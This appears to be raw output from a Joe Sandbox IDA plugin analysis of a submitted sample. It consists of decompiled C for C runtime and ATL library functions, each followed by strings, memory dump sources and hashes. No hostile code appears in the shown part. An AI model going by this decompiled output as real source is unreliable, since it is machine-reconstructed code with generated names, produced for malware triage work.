                      								_t74 =  *((intOrPtr*)( *((intOrPtr*)( *_t117))))(_v56, _a12, _a16);
                      								__eflags = _t136 - _t136;
                      								_v32 = E009D1520(_t74, _t136 - _t136);
                      							}
                      							goto L19;
                      						}
                      						__eflags = E0094EE60(_a4 + 0x2c, 0) & 0x000000ff;
                      						if(__eflags != 0) {
                      							_v8 = 0;
                      							E0094E840(_a4 + 4, _t129, __eflags);
                      							_t107 = _a4;
                      							__eflags =  *(_t107 + 0x28);
                      							if( *(_t107 + 0x28) == 0) {
                      								_t109 = _a4 + 0x2c;
                      								_t80 = E0094EE60(_a4 + 0x2c, 0);
                      								__eflags = _t80 & 0x000000ff;
                      								if((_t80 & 0x000000ff) != 0) {
                      									 *((intOrPtr*)(_a4 + 0x28)) = E00952BD0(_t93, _t109, _t127, _t129,  &_v40);
                      									_t123 = _a4;
                      									__eflags =  *(_t123 + 0x28);
                      									if( *(_t123 + 0x28) >= 0) {
                      										_t86 =  *((intOrPtr*)( *((intOrPtr*)( *_v40))))(_v40, 0xa002d4, E0094EEE0(_a4 + 0x2c));
                      										__eflags = _t136 - _t136;
                      										 *((intOrPtr*)(_a4 + 0x28)) = E009D1520(_t86, _t136 - _t136);
                      										_t125 = _a4;
                      										__eflags =  *(_t125 + 0x28);
                      										if( *(_t125 + 0x28) < 0) {
                      											_v48 = _v40;
                      											__eflags = _v48;
                      											if(_v48 == 0) {
                      												_v52 = 0;
                      											} else {
                      												_t90 =  *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x14))))(1);
                      												__eflags = _t136 - _t136;
                      												_v52 = E009D1520(_t90, _t136 - _t136);
                      											}
                      										}
                      									}
                      								}
                      							}
                      							_v8 = 0xfffffffe;
                      							E0094F8E6();
                      						}
                      						goto L16;
                      					} else {
                      						_v32 = 0x80040110;
                      						goto L19;
                      					}
                      				}
                      			}































                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0094F942
                      Strings
                      • %ls, xrefs: 0094F7CF
                      • pUnkOuter == 0, xrefs: 0094F7CA
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h, xrefs: 0094F7DB
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h$pUnkOuter == 0
                      • API String ID: 930174750-63398507
                      • Opcode ID: 912510a99822814420db634c6f85013eff1c6104ed577bf9089c8ff0ab4bd073
                      • Instruction ID: b17cc453dffccbfaccdd57b55a2a90476a9b7545c9051a142e24d3205a84a59d
                      • Opcode Fuzzy Hash: 912510a99822814420db634c6f85013eff1c6104ed577bf9089c8ff0ab4bd073
                      • Instruction Fuzzy Hash: 5C514E71E0020AAFDB04DF98D491BAE77B5FF88354F108569E90AAB381D7759D81CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 64%
                      			E00946E40(void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				char _v20;
                      				intOrPtr* _v28;
                      				char _v36;
                      				intOrPtr* _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				void _v56;
                      				intOrPtr _t49;
                      				intOrPtr _t54;
                      				intOrPtr _t55;
                      				void* _t57;
                      				intOrPtr _t59;
                      				void* _t63;
                      				void* _t67;
                      				void* _t68;
                      				intOrPtr _t72;
                      				intOrPtr _t82;
                      				intOrPtr* _t83;
                      				void* _t93;
                      				void* _t94;
                      				void* _t95;
                      
                      				_t83 = __edx;
                      				_push(__ecx);
                      				memset( &_v56, 0xcccccccc, 0xd << 2);
                      				_t95 = _t94 + 0xc;
                      				_pop(_t72);
                      				_v8 = _t72;
                      				do {
                      					if(_a4 < 0) {
                      						_v52 = 0;
                      					} else {
                      						_v52 = 1;
                      					}
                      					_v12 = _v52;
                      					_t98 = _v12;
                      					if(_v12 == 0) {
                      						_t68 = L00994930(_t98, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x45, 0, "%ls", L"__atl_condVal");
                      						_t95 = _t95 + 0x18;
                      						if(_t68 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					if(_v12 == 0) {
                      						_t55 = 0;
                      						L28:
                      						_push(_t83);
                      						E009D14C0(_t93, 0x946fe4);
                      						_t57 = _t55;
                      						return E009D1520(_t57, _t93 - _t95 + 0x34);
                      					}
                      					_t83 = 0;
                      					__eflags = 0;
                      				} while (0 != 0);
                      				_t49 = E00951ED0( &_a4,  &_a4, _a4, 1);
                      				_t95 = _t95 + 0xc;
                      				__eflags = _t49;
                      				if(_t49 >= 0) {
                      					_t83 = _a4;
                      					_v44 = L00951F10(_t83, 8);
                      					while(1) {
                      						__eflags = _a4 - _v44;
                      						if(_a4 > _v44) {
                      							_v56 = 0;
                      						} else {
                      							_v56 = 1;
                      						}
                      						_v48 = _v56;
                      						__eflags = _v48;
                      						if(__eflags == 0) {
                      							_t67 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x51, 0, "%ls", L"__atl_condVal");
                      							_t95 = _t95 + 0x18;
                      							__eflags = _t67 - 1;
                      							if(_t67 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v48;
                      						if(_v48 == 0) {
                      							break;
                      						}
                      						__eflags = 0;
                      						if(0 != 0) {
                      							continue;
                      						}
                      						_t83 = _v44;
                      						_t54 = E00941800(_a8,  &_v36, _t83, _a8);
                      						_t95 = _t95 + 0xc;
                      						__eflags = _t54;
                      						if(_t54 < 0) {
                      							L24:
                      							_t55 = 0;
                      							goto L28;
                      						}
                      						_t83 =  &_v20;
                      						_t59 = E00951C60(_t54, _v36, _t83, 0x10, _v36);
                      						_t95 = _t95 + 0xc;
                      						__eflags = _t59;
                      						if(_t59 >= 0) {
                      							_t83 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 4))));
                      							_t63 =  *((intOrPtr*)( *_t83))(_v20);
                      							__eflags = _t95 - _t95;
                      							_v28 = E009D1520(_t63, _t95 - _t95);
                      							__eflags = _v28;
                      							if(_v28 != 0) {
                      								 *_v28 = _v8;
                      								 *((intOrPtr*)(_v28 + 0xc)) = 1;
                      								_t82 = _v44 - 1;
                      								__eflags = _t82;
                      								_t83 = _v28;
                      								 *((intOrPtr*)(_t83 + 8)) = _t82;
                      								 *((intOrPtr*)(_v28 + 4)) = 0;
                      								_t55 = _v28;
                      							} else {
                      								_t55 = 0;
                      							}
                      							goto L28;
                      						}
                      						goto L24;
                      					}
                      					_t55 = 0;
                      					goto L28;
                      				}
                      				_t55 = 0;
                      				goto L28;
                      			}

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00946FC8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlstr.h$__atl_condVal
                      • API String ID: 930174750-415448663
                      • Opcode ID: cae18c11cf10daccfbfe846f9f435df1ddb7cb7bf08751e123acac75f4e7716e
                      • Instruction ID: 2948fccbc442c6a1bc9f6975ab7f17d8341f05c0d3e1facf89a0f2d9d1d1dda5
                      • Opcode Fuzzy Hash: cae18c11cf10daccfbfe846f9f435df1ddb7cb7bf08751e123acac75f4e7716e
                      • Instruction Fuzzy Hash: D051E5B5E10208AFDB00DF94E886FEFBBF4AB89744F108558F901AB381D771D9948B91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E009BC9F0(char _a4, char _a8) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _t55;
                      				void* _t59;
                      				intOrPtr* _t61;
                      				void* _t62;
                      				intOrPtr* _t63;
                      				void* _t65;
                      				void* _t67;
                      				void* _t82;
                      				signed int _t106;
                      				void* _t119;
                      				void* _t120;
                      
                      				_t55 = E009A8780(E0097C080( &_a8));
                      				_t120 = _t119 + 4;
                      				_v8 = _t55;
                      				if((E009BCD50( &_a8) & 0x000000ff) == 0) {
                      					_t59 = E009C46A0(_v8, _v8,  &_a4, 1);
                      					__eflags = _t59 - 1;
                      					if(_t59 != 1) {
                      						_v28 = 0;
                      					} else {
                      						_v28 = 1;
                      					}
                      					return _v28;
                      				}
                      				_t61 = E00977320( &_a8);
                      				_t62 = E00977320( &_a8);
                      				_t125 =  *_t61 -  *((intOrPtr*)(_t62 + 4));
                      				if( *_t61 -  *((intOrPtr*)(_t62 + 4)) < 0) {
                      					_t82 = L00994930(_t125, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_flsbuf.cpp", 0x41, 0, L"%ls", L"(\"inconsistent IOB fields\", stream->_ptr - stream->_base >= 0)");
                      					_t120 = _t120 + 0x18;
                      					if(_t82 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_t63 = E00977320( &_a8);
                      				_v12 =  *_t63 -  *((intOrPtr*)(E00977320( &_a8) + 4));
                      				_t65 = E00977320( &_a8);
                      				 *((intOrPtr*)(E00977320( &_a8))) =  *((intOrPtr*)(_t65 + 4)) + 1;
                      				_t67 = E00977320( &_a8);
                      				 *((intOrPtr*)(E00977320( &_a8) + 8)) =  *((intOrPtr*)(_t67 + 0x18)) - 1;
                      				_v20 = 0;
                      				if(_v12 <= 0) {
                      					__eflags = _v8 - 0xffffffff;
                      					if(_v8 == 0xffffffff) {
                      						L9:
                      						_v16 = 0xa061f0;
                      						L10:
                      						_t106 = _v16;
                      						_t34 = _t106 + 0x28; // 0xa0a0080
                      						__eflags =  *_t34 & 0x20;
                      						if(( *_t34 & 0x20) == 0) {
                      							goto L13;
                      						}
                      						_v36 = E009C54F0(_v8, 0, 0, 2);
                      						_v32 = _t106;
                      						__eflags = (_v36 & _v32) - 0xffffffff;
                      						if((_v36 & _v32) != 0xffffffff) {
                      							goto L13;
                      						}
                      						E009A9080( &_a8, 0x10);
                      						return 1;
                      					}
                      					__eflags = _v8 - 0xfffffffe;
                      					if(_v8 == 0xfffffffe) {
                      						goto L9;
                      					}
                      					_v16 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xb31198 + (_v8 >> 6) * 4));
                      					goto L10;
                      				} else {
                      					_v20 = E009C46A0(_v8, _v8,  *((intOrPtr*)(E00977320( &_a8) + 4)), _v12);
                      					L13:
                      					 *((char*)( *((intOrPtr*)(E00977320( &_a8) + 4)))) = _a4;
                      					if(_v20 != _v12) {
                      						_v24 = 0;
                      					} else {
                      						_v24 = 1;
                      					}
                      					return _v24;
                      				}
                      			}

                      APIs
                        • Part of subcall function 009A8780: std::_Timevec::_Timevec.LIBCPMTD ref: 009A878F
                      • __wcstombs_l.LIBCMTD ref: 009BCB19
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp, xrefs: 009BCA47
                      • %ls, xrefs: 009BCA3E
                      • ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 009BCA39
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___wcstombs_lstd::_
                      • String ID: %ls$("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp
                      • API String ID: 2681442900-3128027998
                      • Opcode ID: 98901eb945b6479e8aed918584bd7b51ca1baf63c9571893da433f5f66f0e29e
                      • Instruction ID: b96c0fbb8134123ccb18a421d5eefdd3de1a5cb7c3025a1699b165b49391f79d
                      • Opcode Fuzzy Hash: 98901eb945b6479e8aed918584bd7b51ca1baf63c9571893da433f5f66f0e29e
                      • Instruction Fuzzy Hash: C551A4B1D00118ABCB14DFA4E956BEEB774AF40320F24C259E81A6F291D770EA44CBC0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E009BCBA0(void* _a4, char _a8) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _t55;
                      				void* _t59;
                      				intOrPtr* _t61;
                      				void* _t62;
                      				intOrPtr* _t63;
                      				void* _t65;
                      				void* _t67;
                      				void* _t82;
                      				signed int _t106;
                      				void* _t119;
                      				void* _t120;
                      
                      				_t55 = E009A8780(E0097C080( &_a8));
                      				_t120 = _t119 + 4;
                      				_v8 = _t55;
                      				if((E009BCD50( &_a8) & 0x000000ff) == 0) {
                      					_t59 = E009C46A0(_v8, _v8,  &_a4, 2);
                      					__eflags = _t59 - 2;
                      					if(_t59 != 2) {
                      						_v28 = 0;
                      					} else {
                      						_v28 = 1;
                      					}
                      					return _v28;
                      				}
                      				_t61 = E00977320( &_a8);
                      				_t62 = E00977320( &_a8);
                      				_t125 =  *_t61 -  *((intOrPtr*)(_t62 + 4));
                      				if( *_t61 -  *((intOrPtr*)(_t62 + 4)) < 0) {
                      					_t82 = L00994930(_t125, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_flsbuf.cpp", 0x41, 0, L"%ls", L"(\"inconsistent IOB fields\", stream->_ptr - stream->_base >= 0)");
                      					_t120 = _t120 + 0x18;
                      					if(_t82 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_t63 = E00977320( &_a8);
                      				_v12 =  *_t63 -  *((intOrPtr*)(E00977320( &_a8) + 4));
                      				_t65 = E00977320( &_a8);
                      				 *((intOrPtr*)(E00977320( &_a8))) =  *((intOrPtr*)(_t65 + 4)) + 2;
                      				_t67 = E00977320( &_a8);
                      				 *((intOrPtr*)(E00977320( &_a8) + 8)) =  *((intOrPtr*)(_t67 + 0x18)) - 2;
                      				_v20 = 0;
                      				if(_v12 <= 0) {
                      					__eflags = _v8 - 0xffffffff;
                      					if(_v8 == 0xffffffff) {
                      						L9:
                      						_v16 = 0xa061f0;
                      						L10:
                      						_t106 = _v16;
                      						_t34 = _t106 + 0x28; // 0xa0a0080
                      						__eflags =  *_t34 & 0x20;
                      						if(( *_t34 & 0x20) == 0) {
                      							goto L13;
                      						}
                      						_v36 = E009C54F0(_v8, 0, 0, 2);
                      						_v32 = _t106;
                      						__eflags = (_v36 & _v32) - 0xffffffff;
                      						if((_v36 & _v32) != 0xffffffff) {
                      							goto L13;
                      						}
                      						E009A9080( &_a8, 0x10);
                      						return 1;
                      					}
                      					__eflags = _v8 - 0xfffffffe;
                      					if(_v8 == 0xfffffffe) {
                      						goto L9;
                      					}
                      					_v16 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xb31198 + (_v8 >> 6) * 4));
                      					goto L10;
                      				} else {
                      					_v20 = E009C46A0(_v8, _v8,  *((intOrPtr*)(E00977320( &_a8) + 4)), _v12);
                      					L13:
                      					 *((short*)( *((intOrPtr*)(E00977320( &_a8) + 4)))) = _a4;
                      					if(_v20 != _v12) {
                      						_v24 = 0;
                      					} else {
                      						_v24 = 1;
                      					}
                      					return _v24;
                      				}
                      			}

                      APIs
                        • Part of subcall function 009A8780: std::_Timevec::_Timevec.LIBCPMTD ref: 009A878F
                      • __wcstombs_l.LIBCMTD ref: 009BCCC9
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp, xrefs: 009BCBF7
                      • %ls, xrefs: 009BCBEE
                      • ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 009BCBE9
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___wcstombs_lstd::_
                      • String ID: %ls$("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp
                      • API String ID: 2681442900-3128027998
                      • Opcode ID: 0784a933350e24461459e28134fafe64a8fa5335326996831ec113f1ded3aab5
                      • Instruction ID: a81d602521327100abca00b734ae10276ff15c0afe05140f44fd82e849b96ac1
                      • Opcode Fuzzy Hash: 0784a933350e24461459e28134fafe64a8fa5335326996831ec113f1ded3aab5
                      • Instruction Fuzzy Hash: 0C5196B1D00108EBCB14DF94E956BEEBB74AF90320F24C659E85A6F2D1D770AA44DBC0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E009AF960(void* __ebx, void* __eflags, intOrPtr _a4, signed int _a8, char _a12, void* _a16) {
                      				char _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				char _v40;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr _t54;
                      				void* _t56;
                      				intOrPtr _t64;
                      				signed int _t65;
                      				signed int _t104;
                      				char _t117;
                      				void* _t125;
                      				void* _t127;
                      				void* _t129;
                      				void* _t130;
                      				void* _t132;
                      				void* _t134;
                      
                      				_t134 = __eflags;
                      				E009AFB20(_a12, _a16);
                      				_t54 = E009AF410(__ebx, _t125, _t134, _a4);
                      				_t129 = _t127 + 0xc;
                      				_v16 = _t54;
                      				if(_v16 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
                      					_t56 = E00999580(0x220, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\mbstring\\mbctype.cpp", 0x19a);
                      					_t130 = _t129 + 0x10;
                      					E0099E560( &_v8, _t56);
                      					__eflags = E0099E620( &_v8) & 0x000000ff;
                      					if(__eflags != 0) {
                      						memcpy(E0099EAE0( &_v8),  *(_a12 + 0x48), 0x88 << 2);
                      						 *(E0099EAE0( &_v8)) = 0;
                      						_t64 = E009AFE00(__ebx,  &_v8, _v16,  *(_a12 + 0x48) + 0x110, __eflags, _v16, E0099EAE0( &_v8));
                      						_t132 = _t130 + 0x14;
                      						_v12 = _t64;
                      						__eflags = _v12 - 0xffffffff;
                      						if(_v12 != 0xffffffff) {
                      							_t65 = _a8 & 0x000000ff;
                      							__eflags = _t65;
                      							if(_t65 == 0) {
                      								_t65 = E0099ECE0();
                      							}
                      							asm("lock xadd [edx], eax");
                      							__eflags = (_t65 | 0xffffffff) == 1;
                      							if((_t65 | 0xffffffff) == 1) {
                      								__eflags =  *(_a12 + 0x48) - 0xa06548;
                      								if(__eflags != 0) {
                      									L00999480(__eflags,  *(_a12 + 0x48), 2);
                      									_t132 = _t132 + 8;
                      								}
                      							}
                      							 *(E0099EAE0( &_v8)) = 1;
                      							 *(_a12 + 0x48) = E0099EA70( &_v8);
                      							_t117 = _a12;
                      							__eflags =  *(_t117 + 0x350) & 0x00000002;
                      							if(( *(_t117 + 0x350) & 0x00000002) != 0) {
                      								L13:
                      								_v28 = _v12;
                      								E0099E5C0( &_v8);
                      								return _v28;
                      							} else {
                      								_t104 =  *0xa067cc; // 0xfffffffe
                      								__eflags = _t104 & 0x00000001;
                      								if(__eflags == 0) {
                      									E009AF0F0(__eflags, 5, E009AF1D0( &_v40,  &_a12,  &_a16));
                      									__eflags = _a8 & 0x000000ff;
                      									if((_a8 & 0x000000ff) != 0) {
                      										 *0xa061e4 =  *_a16;
                      									}
                      									_v32 = _v12;
                      									E0099E5C0( &_v8);
                      									return _v32;
                      								}
                      								goto L13;
                      							}
                      						}
                      						 *((intOrPtr*)(L00992F70( &_v8))) = 0x16;
                      						_v24 = 0xffffffff;
                      						E0099E5C0( &_v8);
                      						return _v24;
                      					}
                      					_v20 = 0xffffffff;
                      					E0099E5C0( &_v8);
                      					return _v20;
                      				}
                      				return 0;
                      			}


























                      APIs
                        • Part of subcall function 009AF410: GetOEMCP.KERNEL32(00000000), ref: 009AF445
                      • __wcstombs_l.LIBCMTD ref: 009AF9AF
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009AF9BB
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp, xrefs: 009AF9A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___wcstombs_lstd::_
                      • String ID: minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp
                      • API String ID: 2681442900-426720447
                      • Opcode ID: f307216fd27aba38e1bd63e4f632f5beb60a69ccafc32536078f49e7df530cc8
                      • Instruction ID: 057d6f5bbbcb593959ff42c9a2115977639c875d39ff82b21a71c77fd377a43c
                      • Opcode Fuzzy Hash: f307216fd27aba38e1bd63e4f632f5beb60a69ccafc32536078f49e7df530cc8
                      • Instruction Fuzzy Hash: 2C516371900209EBCF04EF98D8A2AEF7775BF95314F204568F4159B291EB31AE05CBE0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 72%
                      			E0094E0B0(void* __ebx, signed int* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                      				signed int* _v8;
                      				signed int* _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _t56;
                      				signed int _t57;
                      				void* _t60;
                      				signed int _t64;
                      				void* _t69;
                      				signed int _t89;
                      				void* _t92;
                      				void* _t93;
                      				void* _t94;
                      				void* _t95;
                      
                      				_t93 = __esi;
                      				_t92 = __edi;
                      				_t69 = __ebx;
                      				_v28 = 0xcccccccc;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				if(_v8[1] != _v8[2]) {
                      					L22:
                      					E0094FD00(_v8, _v8[1], _a4);
                      					_t56 = _v8[1] + 1;
                      					__eflags = _t56;
                      					_v8[1] = _t56;
                      					_t57 = 1;
                      					L23:
                      					return E009D1520(_t57, _t94 - _t95 + 0x18);
                      				} else {
                      					goto L1;
                      				}
                      				do {
                      					L1:
                      					if(_a4 <  *_v8 || _a4 >=  *_v8 + _v8[2]) {
                      						_v24 = 1;
                      					} else {
                      						_v24 = 0;
                      					}
                      					_v12 = _v24;
                      					do {
                      						_t100 = _v12;
                      						if(_v12 == 0) {
                      							_t60 = L00994930(_t100, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlsimpcoll.h", 0xac, 0, "%ls", L"__atl_condVal");
                      							_t95 = _t95 + 0x18;
                      							if(_t60 == 1) {
                      								asm("int3");
                      							}
                      						}
                      					} while (0 != 0);
                      					_t103 = _v12;
                      					if(_v12 == 0) {
                      						E00942500(_t69, _t92, _t93, _t103, 0x80004005);
                      					}
                      				} while (0 != 0);
                      				if(_v8[2] != 0) {
                      					_t89 = _v8[1] << 1;
                      					__eflags = _t89;
                      					_v28 = _t89;
                      				} else {
                      					_v28 = 1;
                      				}
                      				_v20 = _v28;
                      				if(_v20 < 0 || _v20 > 0x7fffffff) {
                      					_t57 = 0;
                      				} else {
                      					_t64 = E00992210( *_v8, _v20, 1);
                      					_t95 = _t95 + 0xc;
                      					_v16 = _t64;
                      					__eflags = _v16;
                      					if(__eflags != 0) {
                      						_v8[2] = _v20;
                      						 *_v8 = _v16;
                      						goto L22;
                      					}
                      					_t57 = 0;
                      				}
                      			}




















                      APIs
                      Strings
                      • %ls, xrefs: 0094E11D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlsimpcoll.h, xrefs: 0094E129
                      • __atl_condVal, xrefs: 0094E118
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
